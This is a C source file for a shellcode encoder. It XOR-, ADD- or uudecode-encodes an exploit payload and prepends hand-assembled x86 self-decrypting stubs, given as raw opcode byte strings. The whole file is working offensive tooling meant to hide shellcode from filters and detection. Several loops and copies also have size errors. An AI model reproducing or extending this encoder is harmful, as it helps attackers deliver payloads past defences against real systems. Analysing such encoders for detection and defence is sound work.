#include <stdlib.h>
#include <string.h>
#include "memcrypt.h"
#include "memfunc.h"

static void *getDexorbyte(u_int32_t, size_t, size_t *);
static void *getDexorword(u_int32_t, size_t, size_t *);
static void *getDexordword(u_int32_t, size_t, size_t *);
static void *getDecbyte(u_int32_t, size_t, size_t *);
static void *getDecword(u_int32_t, size_t, size_t *);
static void *getDecdword(u_int32_t, size_t, size_t *);
static void *getUudecode(u_int32_t, size_t, size_t *);
static void *getSizeRoutine(size_t, size_t *);

void *memcrypt(void *shellcode, int type, u_int32_t no, size_t size,
               size_t *retsize)
{
   int i,c=0;
   void *decrypt;
   char *output;
   size_t decsz;		/* Decryptor Size */

   switch(type) {
      case XOR_BYTE:		/* Byte xor routine */
         /* Get the decrypt routine for this shellcode */
        if(!(decrypt = makeDecryptor(XOR_BYTE, size, no, &decsz))) return NULL;

        for(i=0;i<size;i++) {
           ((char *)shellcode)[i] ^= no;	/* Do the xor! */
        }
        break;

      case XOR_WORD:		/* Word xor routine */
         if(!(decrypt = makeDecryptor(XOR_WORD, size, no, &decsz))) return NULL;

         for(i=0;i<size;) {
            ((char *)shellcode)[i++] ^= (no & 0xff);
            ((char *)shellcode)[i++] ^= (no >> 8 & 0xff);
         }
         break;

      case XOR_DWORD:
         if(!(decrypt = makeDecryptor(XOR_DWORD, size, no, &decsz)))
            return NULL;

         for(i=0;i<(size>>2)+1;i++) {
            ((u_int32_t *)shellcode)[i] ^= no;
         }
         break;

      case ADD_BYTE:		/* Byte add routine */
         if(!(decrypt = makeDecryptor(ADD_BYTE, size, no, &decsz))) return NULL;

         for(i=0;i<size;i++) {
            ((char *)shellcode)[i] += no;
         }
         break;

      case ADD_WORD:
         if(!(decrypt = makeDecryptor(ADD_WORD, size, no, &decsz))) return NULL;

         for(i=0;i<size;i++) {
            ((short *)shellcode)[i] += (no & 0xffff);
         }
         break;

      case ADD_DWORD:
         if(!(decrypt = makeDecryptor(ADD_DWORD, size, no, &decsz)))
            return NULL;

         for(i=0;i<(size>>2)+1;i++) {
            ((u_int32_t *)shellcode)[i] += no;
         }
         break;

      case UUDECODE:
         if((no & 0xf) != 0) {
            printf("UUdecode expects a range in which shellcode will fall\n");
            exit(-1);
         }
         if(!(decrypt = makeDecryptor(UUDECODE, size, no, &decsz))) return NULL;

         output = (void *) malloc(decsz + size*2+1);
         memcpy(output, decrypt, decsz);
         for(i=decsz;i<size*2+decsz;c++) {
            output[i++] = ((((char *)shellcode)[c] & 0xf0) >> 4 | no);
            output[i++] = (((char*)shellcode)[c] & (0xf | no));
         }
         *retsize = size*2 + decsz;
         free(decrypt);
         return(output);

      default:
         return NULL;
   }

   output = (char *) malloc(decsz + size + 1);
   memcpy(output, decrypt, decsz);	/* Put decrypt routine in output */

   /*
      Bit of a hack - make sure that 0x00 bytes are going to be copied
      to the output; obviously, strcat() doesn't do this
   */
   memcpy((output+decsz), shellcode, size);

   *retsize = size + decsz;		/* Write back size */
   free(decrypt);			/* Keep memory clean */
   return(output);
}

/*
   This function creates a decryptor for size memory, garbled with
   the "type" encryption with number no
   Returns the size of the decryptor routine in ret_size
*/

void *makeDecryptor(int type, size_t size, u_int32_t no, size_t *ret_size)
{
   switch(type) {
      case XOR_BYTE:	/* Byte xor decryptor */
         return(getDexorbyte(no, size, ret_size));

      case XOR_WORD:	/* Word xor decryptor */
         return(getDexorword(no, size, ret_size));

      case XOR_DWORD:
         return(getDexordword(no, size, ret_size));

      case ADD_BYTE:
         return(getDecbyte(no, size, ret_size));

      case ADD_WORD:
         return(getDecword(no, size, ret_size));

      case ADD_DWORD:
         return(getDecdword(no, size, ret_size));

      case UUDECODE:
         return(getUudecode(no, size, ret_size));

      default:
         return NULL;
   }
   return NULL;
}

/*****************************************************************************\
*** Decryptor Routines                                                      ***
*******************************************************************************
***   --[ Byte functions                                                    ***
***   0xBB marks the position of the byte that will be subtracted           ***
***                                                                         *** 
***   --[ Word functions                                                    ***
***   0xBB 0xAA marks xorno in little endian style                          ***
***                                                                         ***
***   --[ Dword functions                                                   ***
***   0xDD 0xCC 0xBB 0xAA marks xorno in little endian style                ***
***                                                                         ***
***   --[ UUdecode function                                                 ***
***   0xAA marks the size of the shellcode AFTER uuencoding                 ***
***   (see asm/uudecode.asm for details)                                    ***
***                                                                         ***
\*****************************************************************************/

static void *getDexorbyte(u_int32_t no, size_t size, size_t *ret_size)
{
   /* Byte xor decryptor */
   u_int8_t byte_dexor1[] = "\xeb\x0d\x5e\x31\xc9";
   u_int8_t byte_dexor2[] = "\x80\x36\xBB\x46\xe2\xfa\xeb\x05\xe8\xee\xff"
                            "\xff\xff";
   size_t byte_dexor1_s = sizeof(byte_dexor1)-1;
   size_t byte_dexor2_s = sizeof(byte_dexor2)-1;
   size_t byte_dexor_s  = byte_dexor1_s+byte_dexor2_s;
   size_t sizeroutine_s, final;
   u_int8_t *mov, *ret;

   mov = getSizeRoutine(size, &sizeroutine_s);
   final = byte_dexor_s + sizeroutine_s;

   ret = (u_int8_t *)malloc(final);
   memcpy(ret, byte_dexor1, sizeof(byte_dexor1));
   memcpy(ret+byte_dexor1_s, mov, sizeroutine_s);
   memcpy(ret+byte_dexor1_s+sizeroutine_s, byte_dexor2, byte_dexor2_s);

   *((u_int8_t *)memmchr(ret, 0xBB, final)) = no;
   *ret_size = final;

   free(mov);
   return(ret);
}

static void *getDexorword(u_int32_t no, size_t size, size_t *ret_size)
{
   /* Word xor decryptor */
   u_int8_t word_dexor1[] = "\xeb\x10\x5e\x31\xc9";
   u_int8_t word_dexor2[] = "\x66\x81\x36\xBB\xAA\x46\x46\xe2\xf7\xeb\x05"
                            "\xe8\xeb\xff\xff\xff";
   size_t word_dexor1_s = sizeof(word_dexor1) - 1;
   size_t word_dexor2_s = sizeof(word_dexor2) - 1;
   size_t word_dexor_s = word_dexor1_s + word_dexor2_s;
   size_t final, sizeroutine_s;
   u_int8_t *mov, *ret;

   mov = getSizeRoutine(size/2+1, &sizeroutine_s);
   final = word_dexor_s + sizeroutine_s;
   ret = (u_int8_t *)malloc(final);

   memcpy(ret, word_dexor1, word_dexor1_s);
   memcpy(ret+word_dexor1_s, mov, sizeroutine_s);
   memcpy(ret+word_dexor1_s+sizeroutine_s, word_dexor2, word_dexor2_s);

   *((u_int16_t *)memmchr(ret, 0xBB, final)) = no;
   *ret_size = final;

   free(mov);
   return(ret);
}   

static void *getDexordword(u_int32_t no, size_t size, size_t *ret_size)
{
   /* Dword xor decryptor */
   char dword_dexor1[] = "\xeb\x12\x5e\x31\xc9";
   char dword_dexor2[] = "\x81\x36\xDD\xCC\xBB\xAA\x83\xc6\x04\xe2\xf5\xeb\x05"
                         "\xe8\xe9\xff\xff\xff";
   size_t dword_dexor1_s = sizeof(dword_dexor1) - 1;
   size_t dword_dexor2_s = sizeof(dword_dexor2) - 1;
   size_t dword_dexor_s = dword_dexor1_s + dword_dexor2_s;
   size_t final, sizeroutine_s;
   u_int8_t *mov, *ret;

   mov = getSizeRoutine(size/4+1, &sizeroutine_s);
   final = dword_dexor_s + sizeroutine_s;

   ret = (u_int8_t *)malloc(final);

   memcpy(ret, dword_dexor1, dword_dexor_s);
   memcpy(ret+dword_dexor1_s, mov, sizeroutine_s);
   memcpy(ret+dword_dexor1_s+sizeroutine_s, dword_dexor2, dword_dexor2_s);

   *((u_int32_t *)memmchr(ret, 0xDD, final)) = no;
   *ret_size = final;

   free(mov);
   return(ret);
}

static void *getDecbyte(u_int32_t no, size_t size, size_t *ret_size)
{
   /* Byte addition decryptor */
   u_int8_t byte_dec1[]  = "\xeb\x0d\x5e\x31\xc9";
   u_int8_t byte_dec2[]  = "\x80\x2e\xBB\x46\xe2\xfa\xeb\x05\xe8\xee\xff"
                           "\xff\xff";
   size_t byte_dec1_s = sizeof(byte_dec1) - 1;
   size_t byte_dec2_s = sizeof(byte_dec2) - 1;
   size_t byte_dec_s = byte_dec1_s + byte_dec2_s;
   size_t final, sizeroutine_s;
   u_int8_t *mov, *ret;

   mov = getSizeRoutine(size, &sizeroutine_s);
   final = byte_dec_s + sizeroutine_s;

   ret = (u_int8_t *)malloc(final);

   memcpy(ret, byte_dec1, byte_dec1_s);
   memcpy(ret+byte_dec1_s, mov, sizeroutine_s);
   memcpy(ret+byte_dec1_s+sizeroutine_s, byte_dec2, byte_dec2_s);

   *((u_int8_t *) memmchr(ret, 0xBB, final)) = no;
   *ret_size = final;

   free(mov);
   return(ret);
}

static void *getDecword(u_int32_t no, size_t size, size_t *ret_size)
{
   /* Word addition decryptor */
   char word_dec1[]  = "\xeb\x10\x5e\x31\xc9";
   char word_dec2[]  = "\x66\x81\x2e\xBB\xAA\x46\x46\xe2\xf7\xeb\x05\xe8\xeb"
                       "\xff\xff\xff";
   size_t word_dec1_s = sizeof(word_dec1) - 1;
   size_t word_dec2_s = sizeof(word_dec2) - 1;
   size_t word_dec_s = word_dec1_s + word_dec2_s;
   size_t final, sizeroutine_s;
   u_int8_t *mov, *ret;

   mov = getSizeRoutine(size/2+1, &sizeroutine_s);
   final = word_dec_s + sizeroutine_s;

   ret = (u_int8_t *)malloc(final);

   memcpy(ret, word_dec1, word_dec1_s);
   memcpy(ret+word_dec1_s, mov, sizeroutine_s);
   memcpy(ret+word_dec1_s+sizeroutine_s, word_dec2, word_dec2_s);

   *((u_int16_t *)memmchr(ret, 0xBB, final)) = no;
   *ret_size = final;

   free(mov);
   return(ret);
}

static void *getDecdword(u_int32_t no, size_t size, size_t *ret_size)
{
   /* Dword addition decryptor */
   u_int8_t dword_dec1[] = "\xeb\x12\x5e\x31\xc9";
   u_int8_t dword_dec2[] = "\x81\x2e\xDD\xCC\xBB\xAA\x83\xc6\x04\xe2\xf5"
                           "\xeb\x05\xe8\xe9\xff\xff\xff";
   size_t dword_dec1_s = sizeof(dword_dec1) - 1;
   size_t dword_dec2_s = sizeof(dword_dec2) - 1;
   size_t dword_dec_s = dword_dec1_s + dword_dec2_s;
   size_t final, sizeroutine_s;
   u_int8_t *mov, *ret;

   mov = getSizeRoutine(size/4+1, &sizeroutine_s);
   final = dword_dec_s + sizeroutine_s;

   ret = (u_int8_t *)malloc(final);

   memcpy(ret, dword_dec1, dword_dec1_s);
   memcpy(ret+dword_dec1_s, mov, sizeroutine_s);
   memcpy(ret+dword_dec1_s+sizeroutine_s, dword_dec2, dword_dec2_s);

   *((u_int32_t *)memmchr(ret, 0xDD, final)) = no;
   *ret_size = final;

   free(mov);
   return(ret);
}

static void *getUudecode(u_int32_t no, size_t size, size_t *ret_size)
{
   u_int8_t uudecode1[] = "\xeb\x1e\x5e\x89\xf7\x31\xc9";
   u_int8_t uudecode2[] = "\x8a\x06\x8a\x5e\x01\xc0\xe0\x04\x80\xe3\x0f\x08"
                          "\xd8\x88\x07\x83\xc6\x02\x47\xe2\xeb\xeb\x05\xe8"
                          "\xdd\xff\xff\xff";
   size_t uudecode1_s = sizeof(uudecode1) - 1;
   size_t uudecode2_s = sizeof(uudecode2) - 1;
   size_t uudecode_s = uudecode1_s + uudecode2_s;
   size_t final, sizeroutine_s;
   u_int8_t *mov, *ret;

   mov = getSizeRoutine(size, &sizeroutine_s);
   final = uudecode_s + sizeroutine_s;

   ret = (u_int8_t *)malloc(final);

   memcpy(ret, uudecode1, uudecode1_s);
   memcpy(ret+uudecode1_s, mov, sizeroutine_s);
   memcpy(ret+uudecode1_s+sizeroutine_s, uudecode2, uudecode2_s);

   *ret_size = final;

   free(mov);
   return(ret);
}

static void *getSizeRoutine(size_t size, size_t *ret_size)
{
   u_int8_t movcl[]  = "\xb1\xAA";
   u_int8_t movcx[]  = "\x66\xb9\xAA\xAA";
   u_int8_t movecx[] = "\xb9\xAA\xAA\xAA\xAA";
   void *s;

   if(size <= UCHAR_MAX) {
      s = (void *)memchr(movcl, 0xAA, sizeof(movcl) - 1);
      *(u_int8_t *)s = size;
      *ret_size = sizeof(movcl)-1;
      return((void *)memdup(movcl, sizeof(movcl)-1));
   } else if(size <= USHRT_MAX) {
      s = (void *)memchr(movcx, 0xAA, sizeof(movcx) - 1);
      *(u_int16_t *)s = size;
      *ret_size = sizeof(movcx)-1;
      return((void *)memdup(movcx, sizeof(movcx)-1));
   } else if(size <= UINT_MAX) {
       s = (void *)memchr(movecx, 0xAA, sizeof(movecx) - 1);
       *(u_int32_t *)s = size;
       *ret_size = sizeof(movecx)-1;
       return((void *)memdup(movecx, sizeof(movecx)-1));
   } else {
      fprintf(stderr, "Shellcode too large, aborting...\n");
      exit(-1);
   }
}

/* Not used - perhaps later */

void pxorerror(void)
{
   switch(errno) {
      case SIZEERR:
         fprintf(stderr, "Shellcode too big\n");
         break;
      case XORBYTETOOBIGERR:
         fprintf(stderr, "Can't byte xor with a number bigger than 255\n");
         break;
      case XORWORDTOOBIGERR:
         fprintf(stderr, "Can't word xor with a number bigger than 65535\n");
         break;
      case XORWORDTOOSMALLERR:
         fprintf(stderr, "Word not big enough - use byte xorring instead\n");
         break;
      default:
         fprintf(stderr, "An unknown error occured\n");
         break;
   }
}
